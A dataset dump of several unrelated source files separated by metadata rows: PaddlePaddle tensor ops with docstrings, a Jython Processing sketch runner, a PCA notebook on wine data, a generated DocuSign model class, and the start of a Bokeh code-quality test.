check_variable_and_dtype(x, 'dtype', ['float32', 'float64'], 'scatter')
check_type(overwrite, 'overwrite', bool, 'scatter')
helper = LayerHelper('scatter', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type="scatter",
inputs={"X": x,
"Ids": index,
"Updates": updates},
attrs={'overwrite': overwrite},
outputs={"Out": out})
return out
def scatter_nd_add(x, index, updates, name=None):
"""
**Scatter_nd_add Layer**
Output is obtained by applying sparse addition to a single value
or slice in a Tensor.
:attr:`x` is a Tensor with ndim :math:`R`
and :attr:`index` is a Tensor with ndim :math:`K` . Thus, :attr:`index`
has shape :math:`[i_0, i_1, ..., i_{K-2}, Q]` where :math:`Q \leq R` . :attr:`updates`
is a Tensor with ndim :math:`K - 1 + R - Q` and its
shape is :math:`index.shape[:-1] + x.shape[index.shape[-1]:]` .
According to the :math:`[i_0, i_1, ..., i_{K-2}]` of :attr:`index` ,
add the corresponding :attr:`updates` slice to the :attr:`x` slice
which is obtained by the last one dimension of :attr:`index` .
.. code-block:: text
Given:
* Case 1:
x = [0, 1, 2, 3, 4, 5]
index = [[1], [2], [3], [1]]
updates = [9, 10, 11, 12]
we get:
output = [0, 22, 12, 14, 4, 5]
* Case 2:
x = [[65, 17], [-14, -25]]
index = [[], []]
updates = [[[-1, -2], [1, 2]],
[[3, 4], [-3, -4]]]
x.shape = (2, 2)
index.shape = (2, 0)
updates.shape = (2, 2, 2)
we get:
output = [[67, 19], [-16, -27]]
Args:
x (Tensor): The x input. Its dtype should be float32, float64.
index (Tensor): The index input with ndim > 1 and index.shape[-1] <= x.ndim.
Its dtype should be int32 or int64 as it is used as indexes.
updates (Tensor): The updated value of scatter_nd_add op, and it must have the same dtype
as x. It must have the shape index.shape[:-1] + x.shape[index.shape[-1]:].
name (str|None): The output tensor name. If set None, the layer will be named automatically.
Returns:
output (Tensor): The output is a tensor with the same shape and dtype as x.
Examples:
.. code-block:: python
import paddle
import numpy as np
x = paddle.rand(shape=[3, 5, 9, 10], dtype='float32')
updates = paddle.rand(shape=[3, 9, 10], dtype='float32')
index_data = np.array([[1, 1],
[0, 1],
[1, 3]]).astype(np.int64)
index = paddle.to_tensor(index_data)
output = paddle.scatter_nd_add(x, index, updates)
"""
return layers.scatter_nd_add(x, index, updates, name=None)
def chunk(x, chunks, axis=0, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
chunks(int): The number of tensor to be split along the certain axis.
axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
If :math::`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Tensor): The list of segmented Tensors.
Example:
.. code-block:: python
import numpy as np
import paddle
# x is a Tensor which shape is [3, 9, 5]
x_np = np.random.random([3, 9, 5]).astype("int32")
x = paddle.to_tensor(x_np)
out0, out1, out2 = paddle.chunk(x, chunks=3, axis=1)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
# axis is negative, the real axis is (rank(x) + axis) which real
# value is 1.
out0, out1, out2 = paddle.chunk(x, chunks=3, axis=-2)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
"""
check_type(chunks, 'chunks', (int), 'chunk')
return paddle.fluid.layers.split(
input=x, num_or_sections=chunks, dim=axis, name=name)
def tile(x, repeat_times, name=None):
"""
Construct a new Tensor by repeating ``x`` the number of times given by ``repeat_times``.
After tiling, the value of the i'th dimension of the output is equal to ``x.shape[i]*repeat_times[i]``.
Both the number of dimensions of ``x`` and the number of elements in ``repeat_times`` should be less than or equal to 6.
Args:
x (Tensor): The input tensor, its data type should be bool, float32, float64, int32 or int64.
repeat_times (Tensor|tuple|list): The number of repeating times. If repeat_times is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If repeat_times is a Tensor, it should be an 1-D Tensor with the data type int32.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
paddle.disable_static()
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.tile(data, repeat_times=[2, 1])
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
out = paddle.tile(data, repeat_times=[2, 2])
np_out = out.numpy()
# [[1, 2, 3, 1, 2, 3], [1, 2, 3, 1, 2, 3]]
repeat_times = paddle.to_tensor([2, 1], dtype='int32')
out = paddle.tile(data, repeat_times=repeat_times)
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return core.ops.tile(x, 'repeat_times', repeat_times)
check_type(repeat_times, 'repeat_times', (list, tuple, Variable), 'tile')
if isinstance(repeat_times, Variable):
assert len(repeat_times.shape) == 1, (
'repeat_times must be an 1-D Tensor.')
else:
for elem in repeat_times:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in repeat_times must be 1-D Tensors or integers.')
else:
if six.PY3:
type_tuple = (int, np.int32, np.int64)
elif six.PY2:
type_tuple = (int, long, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in repeat_times must be 1-D Tensors or integers.')
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'tile')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError(
"When the date type is bool for the input 'x' of tile op, you "
"must set its stop_gradient to be True by "
"some_var.stop_gradient == True supporting some_var is the input.")
helper = LayerHelper('tile', **locals())
inputs = {"X": [x]}
attrs = {}
def get_attr_repeat_times(list_repeat_times):
attrs_repeat_times = []
for idx, times in enumerate(list_repeat_times):
if isinstance(times, Variable):
attrs_repeat_times.append(-1)
else:
attrs_repeat_times.append(times)
assert times > 0, (
"All elements in repeat_times must be positive for tile.")
return attrs_repeat_times
if isinstance(repeat_times, Variable):
repeat_times.stop_gradient = True
inputs['RepeatTimes'] = repeat_times
attrs['repeat_times'] = [-1]
elif isinstance(repeat_times, (list, tuple)):
attrs['repeat_times'] = get_attr_repeat_times(repeat_times)
if utils._contain_var(repeat_times):
inputs['repeat_times_tensor'] = utils._convert_to_tensor_list(
repeat_times)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='tile', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def expand_as(x, y, name=None):
"""
Expand the input tensor ``x`` to the same shape as the input tensor ``y``.
Both the number of dimensions of ``x`` and ``y`` must be less than or equal to 6, and the number of dimensions of ``y`` must be greather than or equal to that of ``x``. The dimension to expand must have a value of 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
y (Tensor): The input tensor that gives the shape to expand to.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor: A Tensor with the same shape as ``y``. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
paddle.disable_static()
data_x = paddle.to_tensor([1, 2, 3], 'int32')
data_y = paddle.to_tensor([[1, 2, 3], [4, 5, 6]], 'int32')
out = paddle.expand_as(data_x, data_y)
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return core.ops.expand_as_v2(x, y)
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand_as')
check_type(y, 'y', Variable, 'expand_as')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError(
"When the data type of input 'x' for expand_as is bool, "
"you must set its stop_gradient to be False by "
"some_var.stop_gradient = True, supporting "
"some_var as the input 'x'.")
inputs = {"X": [x], "target_tensor": [y]}
helper = LayerHelper('expand_as', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type='expand_as_v2', inputs=inputs, outputs={'Out': out})
return out
def expand(x, shape, name=None):
"""
Expand the input tensor to a given shape.
Both the number of dimensions of ``x`` and the number of elements in ``shape`` should be less than or equal to 6. The dimension to expand must have a value 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
shape (list|tuple|Tensor): The result shape after expanding. The data type is int32. If shape is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If shape is a Tensor, it should be an 1-D Tensor with the data type int32.
The value -1 in shape means keeping the corresponding dimension unchanged.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
N-D Tensor: A Tensor with the given shape. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
paddle.disable_static()
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.expand(data, shape=[2, 3])
out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return core.ops.expand_v2(x, 'shape', shape)
if isinstance(shape, Variable):
assert len(shape.shape) == 1, ('shape must be an 1-D Tensor.')
else:
for elem in shape:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in shape must be 1-D Tensors or integers.')
else:
if six.PY3:
type_tuple = (int, np.int32, np.int64)
elif six.PY2:
type_tuple = (int, long, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in shape must be 1-D Tensors or integers.')
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand')
check_type(shape, 'shape', (list, tuple, Variable), 'expand')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError("When the data type of input 'x' for expand is bool, "
"you must set its stop_gradient to be False by "
"some_var.stop_gradient = True, supporting "
"some_var as the input.")
inputs = {"X": [x]}
attrs = {}
helper = LayerHelper('expand', **locals())
def get_attr_expand_shape(list_expand_shape):
attrs_expand_shape = []
for idx, shape in enumerate(list_expand_shape):
if isinstance(shape, Variable):
attrs_expand_shape.append(-1)
else:
attrs_expand_shape.append(shape)
assert shape > 0 or shape == -1, (
"All elements in shape of expand must be positive or -1.")
return attrs_expand_shape
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs['Shape'] = shape
elif isinstance(shape, (list, tuple)):
attrs['shape'] = get_attr_expand_shape(shape)
if utils._contain_var(shape):
inputs['expand_shapes_tensor'] = utils._convert_to_tensor_list(
shape)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_v2', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
broadcast_to = expand
def reshape(x, shape, name=None):
"""
This operator changes the shape of ``x`` without changing its data.
Some tricks exist when specifying the target shape.
1. -1 means the value of this dimension is inferred from the total element
number of x and remaining dimensions. Thus one and only one dimension can
be set -1.
2. 0 means the actual dimension value is going to be copied from the
corresponding dimension of x. The index of 0s in shape can not exceed
the dimension of x.
Here are some examples to explain it.
1. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [6, 8], the reshape operator will transform x into a 2-D tensor with
shape [6, 8] and leaving x's data unchanged.
2. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
specified is [2, 3, -1, 2], the reshape operator will transform x into a
4-D tensor with shape [2, 3, 4, 2] and leaving x's data unchanged. In this
case, one dimension of the target shape is set to -1, the value of this
dimension is inferred from the total element number of x and remaining
dimensions.
3. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [-1, 0, 3, 2], the reshape operator will transform x into a 4-D tensor
with shape [2, 4, 3, 2] and leaving x's data unchanged. In this case,
besides -1, 0 means the actual dimension value is going to be copied from
the corresponding dimension of x.
Args:
x(Tensor): An N-D Tensor. The data type is ``float32``, ``float64``, ``int32``, ``int64`` or ``bool``
shape(list|tuple|Tensor): Define the target shape. At most one dimension of the target shape can be -1.
The data type is ``int32`` . If ``shape`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``shape`` is an Tensor, it should be an 1-D Tensor .
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A reshaped Tensor with the same data type as ``x``.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.rand([2, 4, 6], dtype="float32")
positive_four = paddle.full([1], 4, "int32")
out = paddle.reshape(x, [-1, 0, 3, 2])
print(out)
# the shape is [2,4,3,2].
out = paddle.reshape(x, shape=[positive_four, 12])
print(out)
# the shape of out_2 is [4, 12].
shape_tensor = paddle.to_tensor(np.array([8, 6]).astype("int32"))
out = paddle.reshape(x, shape=shape_tensor)
print(out)
# the shape is [8, 6].
"""
return paddle.fluid.layers.reshape(x=x, shape=shape, name=name)
def gather_nd(x, index, name=None):
"""
This function is actually a high-dimensional extension of :code:`gather`
and supports for simultaneous indexing by multiple axes. :attr:`index` is a
K-dimensional integer tensor, which is regarded as a (K-1)-dimensional
tensor of :attr:`index` into :attr:`input`, where each element defines
a slice of params:
.. math::
output[(i_0, ..., i_{K-2})] = input[index[(i_0, ..., i_{K-2})]]
Obviously, :code:`index.shape[-1] <= input.rank` . And, the output tensor has
shape :code:`index.shape[:-1] + input.shape[index.shape[-1]:]` .
.. code-block:: text
Given:
x = [[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]]
x.shape = (2, 3, 4)
* Case 1:
index = [[1]]
gather_nd(x, index)
= [x[1, :, :]]
= [[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]
* Case 2:
index = [[0,2]]
gather_nd(x, index)
= [x[0, 2, :]]
= [8, 9, 10, 11]
* Case 3:
index = [[1, 2, 3]]
gather_nd(x, index)
= [x[1, 2, 3]]
= [23]
Args:
x (Tensor): The input Tensor which it's data type should be bool, float32, float64, int32, int64.
index (Tensor): The index input with rank > 1, index.shape[-1] <= input.rank.
Its dtype should be int32, int64.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
output (Tensor): A tensor with the shape index.shape[:-1] + input.shape[index.shape[-1]:]
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[[1, 2], [3, 4], [5, 6]],
[[7, 8], [9, 10], [11, 12]]])
index = paddle.to_tensor([[0, 1]])
output = paddle.gather_nd(x, index) #[[3, 4]]
"""
return paddle.fluid.layers.gather_nd(input=x, index=index, name=name)
def strided_slice(x, axes, starts, ends, strides, name=None):
"""
This operator produces a slice of ``x`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
to slice the input data tensor. If a negative value is passed to
``starts`` or ``ends`` such as :math:`-i`, it represents the reverse position of the
axis :math:`i-1` th(here 0 is the initial position). The ``strides`` represents steps of
slicing and if the ``strides`` is negative, slice operation is in the opposite direction.
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
to pass in INT_MAX. The size of ``axes`` must be equal to ``starts`` , ``ends`` and ``strides``.
Following examples will explain how strided_slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
strides = [1, 1]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [2, 0]
strides = [1, -1]
Then:
result = [ [8, 7, 6], ]
Case3:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000]
strides = [1, 3]
Then:
result = [ [2], ]
Args:
x (Tensor): An N-D ``Tensor``. The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
It's optional. If it is not provides, it will be treated as :math:`[0,1,...,len(starts)-1]`.
starts (list|tuple|Tensor): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of it should be integers or Tensors with shape [1]. If ``starts`` is an Tensor, it should be an 1-D Tensor. It represents starting indices of corresponding axis in ``axes``.
ends (list|tuple|Tensor): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``ends`` is an Tensor, it should be an 1-D Tensor . It represents ending indices of corresponding axis in ``axes``.
strides (list|tuple|Tensor): The data type is ``int32`` . If ``strides`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``strides`` is an Tensor, it should be an 1-D Tensor . It represents slice step of corresponding axis in ``axes``.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A ``Tensor`` with the same dimension as ``x``. The data type is same as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.zeros(shape=[3,4,5,6], dtype="float32")
# example 1:
# attr starts is a list which doesn't contain Tensor.
axes = [1, 2, 3]
starts = [-3, 0, 2]
ends = [3, 2, 4]
strides_1 = [1, 1, 1]
strides_2 = [1, 1, 2]
sliced_1 = paddle.strided_slice(x, axes=axes, starts=starts, ends=ends, strides=strides_1)
# sliced_1 is x[:, 1:3:1, 0:2:1, 2:4:1].
# example 2:
# attr starts is a list which contain tensor Tensor.
minus_3 = paddle.fill_constant([1], "int32", -3)
sliced_2 = paddle.strided_slice(x, axes=axes, starts=[minus_3, 0, 2], ends=ends, strides=strides_2)
# sliced_2 is x[:, 1:3:1, 0:2:1, 2:4:2].
"""
return paddle.fluid.layers.strided_slice(
input=x, axes=axes, starts=starts, ends=ends, strides=strides)
| 37.901363
| 457
| 0.555131
|
4a01fa3d7a99cec1fb19a8d40c599f7782f1cbd5
| 2,825
|
py
|
Python
|
pycessing/sketch_runner.py
|
kitao/pycessing
|
ab59dfbef7f52712e894f5b4d869c27f68bf3685
|
[
"MIT"
] | null | null | null |
pycessing/sketch_runner.py
|
kitao/pycessing
|
ab59dfbef7f52712e894f5b4d869c27f68bf3685
|
[
"MIT"
] | null | null | null |
pycessing/sketch_runner.py
|
kitao/pycessing
|
ab59dfbef7f52712e894f5b4d869c27f68bf3685
|
[
"MIT"
] | null | null | null |
import os
import sys
import settings
import sketch_info
import state_control
import watch_update
import gui
def load_library(name):
lib_dir = os.path.join(settings.COMMAND_LIB, name, 'library')
if load_all_jars(lib_dir):
return True
else:
print 'library not found -- {0}'.format(name)
return False
def load_all_jars(path):
import fnmatch
if not os.path.isdir(path):
return False
is_success = False
for name in os.listdir(path):
if fnmatch.fnmatch(name, '*.jar'):
# sys.path.append(os.path.join(path, name))
load_jar(os.path.join(path, name))
is_success = True
print 'jar file added -- {0}'.format(name)
return is_success
def load_jar(jar_file):
import java.io
import java.net
import java.lang
url = (java.io.File(jar_file).toURL()
if type(jar_file) != java.net.URL else jar_file)
method = java.net.URLClassLoader.getDeclaredMethod('addURL',
[java.net.URL])
method.accessible = 1
method.invoke(java.lang.ClassLoader.getSystemClassLoader(), [url])
# from java.util.jar import JarFile
# jf = JarFile(jar_file)
# for e in jf.entries():
# print e
def complete_path(path):
return os.path.join(sketch_info.sketch_dir, path)
def run_app(app):
from processing.core import PApplet
PApplet.runSketch([app._title], app)
_to_reload = False
_to_exit = False
def reload_sketch():
global _to_reload
_to_reload = True
def exit_sketch():
global _to_exit
_to_exit = True
def start():
if len(sys.argv) < 2:
print 'usage: {0} [sketchfile]'.format(settings.COMMAND_NAME)
sys.exit()
sketch_info.init_sketch_info(sys.argv[1])
if not os.path.exists(sketch_info.filename):
print 'sketch file not found -- {0}'.format(sketch_info.filename)
sys.exit()
if not load_library('core'):
sys.exit()
from processing.core import PApplet # NOQA
sys.path.append(settings.COMMAND_ROOT)
sys.path.insert(0, sketch_info.dirname)
state_info = state_control.get_state_info()
gui.create(reload_sketch, exit_sketch)
import app
while True:
# run sketh
print '\n****** START SKETCH ******\n'
try:
__import__(sketch_info.modname)
except Exception as e:
print e
# watch file changed
base_time = watch_update.get_current_time()
while watch_update.watch_update(
sketch_info.dirname, '*.py', base_time, settings.WATCH_INTERVAL):
app.App._update_apps()
global _to_reload, _to_exit
if _to_reload:
_to_reload = False
break
if _to_exit:
exit()
# restore execution environment
app.App._dispose_apps()
state_control.restore_state(state_info)
import java.lang
java.lang.System.gc()
if __name__ == '__main__':
start()
| 20.323741
| 73
| 0.67115
|
4a01faf0e4ed99a5babd3234ae5e12c9f77fbd5f
| 1,757
|
py
|
Python
|
Principal Components Analysis.py
|
harindi-git1994/PCA
|
242ef2396198bbcd62c2f835d250878c732add33
|
[
"MIT"
] | null | null | null |
Principal Components Analysis.py
|
harindi-git1994/PCA
|
242ef2396198bbcd62c2f835d250878c732add33
|
[
"MIT"
] | null | null | null |
Principal Components Analysis.py
|
harindi-git1994/PCA
|
242ef2396198bbcd62c2f835d250878c732add33
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # PCA (Principal Components Analysis)
# ## wine.cvs
# In[16]:
#importing necessary libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn.decomposition as sk
from sklearn.decomposition import PCA
from sklearn.preprocessing import scale
# In[17]:
#imporing the dataset
wine = pd.read_csv("C:\\Users\\yhari\\OneDrive\\Documents\\1. Data Analyst Training\\CSV files\\wine.csv")
# In[18]:
#describe the dataset
wine.describe()
# In[19]:
#view top 5 records
wine.head()
# In[20]:
#Consider only the numerical data
wine.data = wine.iloc[:,1:]
# In[21]:
wine.data.head()
# In[22]:
#Standardizing;Normalizing the numerical data
wine_norm = scale(wine.data)
# In[23]:
#look for the type of data, array or dataframe
type(wine_norm)
# In[24]:
#convert ndarray into a dataframe
wine1 = pd.DataFrame(wine_norm)
# In[25]:
wine1.head(3)
# In[26]:
#creating PCA models
x = PCA()
m1 = PCA().fit_transform(wine1)
m2 = x.fit_transform(wine_norm)
# In[27]:
#shape of the PCA model
m1
# In[28]:
#The amount of varience that each PCA explain is
var = x.explained_variance_ratio_
var
# In[29]:
#components of PCA
x.components_
# In[30]:
#conver the ndarray to a dataframe
wts = pd.DataFrame(x.components_)
wts
# In[31]:
#cumilative varience
cumvar = np.cumsum(np.round(var, decimals = 4)*100)
cumvar
# In[32]:
newdata = pd.DataFrame(cumvar)
# In[33]:
newdata.head()
# In[34]:
#convert the m1 model's ndarray to a dataframe and assign
#to a new variable call new_wine
new_wine = pd.DataFrame(m1)
new_wine
# In[35]:
#variance plot for PCA components obtained
plt.plot(cumvar, color='red')
plt.show()
# In[ ]:
| 10.845679
| 106
| 0.688674
|
4a01fb27b376230cc60a0ac29406f39855992469
| 6,459
|
py
|
Python
|
docusign_esign/models/workspace_list.py
|
hunk/docusign-python-client
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
[
"MIT"
] | null | null | null |
docusign_esign/models/workspace_list.py
|
hunk/docusign-python-client
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
[
"MIT"
] | null | null | null |
docusign_esign/models/workspace_list.py
|
hunk/docusign-python-client
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class WorkspaceList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, end_position=None, result_set_size=None, start_position=None, total_set_size=None, workspaces=None):
"""
WorkspaceList - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'end_position': 'str',
'result_set_size': 'str',
'start_position': 'str',
'total_set_size': 'str',
'workspaces': 'list[Workspace]'
}
self.attribute_map = {
'end_position': 'endPosition',
'result_set_size': 'resultSetSize',
'start_position': 'startPosition',
'total_set_size': 'totalSetSize',
'workspaces': 'workspaces'
}
self._end_position = end_position
self._result_set_size = result_set_size
self._start_position = start_position
self._total_set_size = total_set_size
self._workspaces = workspaces
@property
def end_position(self):
"""
Gets the end_position of this WorkspaceList.
The last position in the result set.
:return: The end_position of this WorkspaceList.
:rtype: str
"""
return self._end_position
@end_position.setter
def end_position(self, end_position):
"""
Sets the end_position of this WorkspaceList.
The last position in the result set.
:param end_position: The end_position of this WorkspaceList.
:type: str
"""
self._end_position = end_position
@property
def result_set_size(self):
"""
Gets the result_set_size of this WorkspaceList.
The number of results returned in this response.
:return: The result_set_size of this WorkspaceList.
:rtype: str
"""
return self._result_set_size
@result_set_size.setter
def result_set_size(self, result_set_size):
"""
Sets the result_set_size of this WorkspaceList.
The number of results returned in this response.
:param result_set_size: The result_set_size of this WorkspaceList.
:type: str
"""
self._result_set_size = result_set_size
@property
def start_position(self):
"""
Gets the start_position of this WorkspaceList.
Starting position of the current result set.
:return: The start_position of this WorkspaceList.
:rtype: str
"""
return self._start_position
@start_position.setter
def start_position(self, start_position):
"""
Sets the start_position of this WorkspaceList.
Starting position of the current result set.
:param start_position: The start_position of this WorkspaceList.
:type: str
"""
self._start_position = start_position
@property
def total_set_size(self):
"""
Gets the total_set_size of this WorkspaceList.
The total number of items available in the result set. This will always be greater than or equal to the value of the property returning the results in the in the response.
:return: The total_set_size of this WorkspaceList.
:rtype: str
"""
return self._total_set_size
@total_set_size.setter
def total_set_size(self, total_set_size):
"""
Sets the total_set_size of this WorkspaceList.
The total number of items available in the result set. This will always be greater than or equal to the value of the property returning the results in the in the response.
:param total_set_size: The total_set_size of this WorkspaceList.
:type: str
"""
self._total_set_size = total_set_size
@property
def workspaces(self):
"""
Gets the workspaces of this WorkspaceList.
A list of workspaces.
:return: The workspaces of this WorkspaceList.
:rtype: list[Workspace]
"""
return self._workspaces
@workspaces.setter
def workspaces(self, workspaces):
"""
Sets the workspaces of this WorkspaceList.
A list of workspaces.
:param workspaces: The workspaces of this WorkspaceList.
:type: list[Workspace]
"""
self._workspaces = workspaces
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.493151
| 179
| 0.598699
|
4a01fb375bf0ce681ec450424a4efcc991d75fa8
| 4,974
|
py
|
Python
|
tests/codebase/test_code_quality.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 12
|
2020-07-20T14:58:31.000Z
|
2021-09-04T22:15:14.000Z
|
tests/codebase/test_code_quality.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 1
|
2020-09-05T02:46:20.000Z
|
2020-09-05T02:46:20.000Z
|
tests/codebase/test_code_quality.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 3
|
2019-03-27T23:27:05.000Z
|
2020-08-05T19:03:19.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import io
from os import pardir
from os.path import split, join, abspath, relpath, basename, splitext
import subprocess
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
@pytest.mark.codebase
def test_code_quality():
''' Applies a collection of general codebase style and quality rules to
every file inm the repository. Unless specifically excepted:
* Files should not contain tabs
* Files should not start with newlines
* Files should end with one empty line
* Lines should not contain trailing whitespace
* Lines should not exceed 160 characters
'''
errors = collect_errors()
assert len(errors) == 0, "Code quality issues:\n%s" % "\n".join(errors)
#-----------------------------------------------------------------------------
# Support
#-----------------------------------------------------------------------------
# This is based on sympy's sympy/utilities/tests/test_code_quality.py
TOP_PATH = abspath(join(split(__file__)[0], pardir, pardir))
MAX_LINE_LENGTH = 160
message_space = "File contains trailing whitespace: %s, line %s."
message_tabs = "File contains tabs instead of spaces: %s, line %s."
message_carriage = "File contains carriage returns at end of line: %s, line %s"
message_eof = "File does not end with a newline: %s, line %s"
message_multi_bof = "File starts with more than 1 empty line: %s, line %s"
message_multi_eof = "File ends with more than 1 empty line: %s, line %s"
message_too_long = "File contains a line with over %(n)s characters: %%s, line %%s" % dict(n=MAX_LINE_LENGTH)
def tab_in_leading(s):
""" Returns True if there are tabs in the leading whitespace of a line,
including the whitespace of docstring code samples.
"""
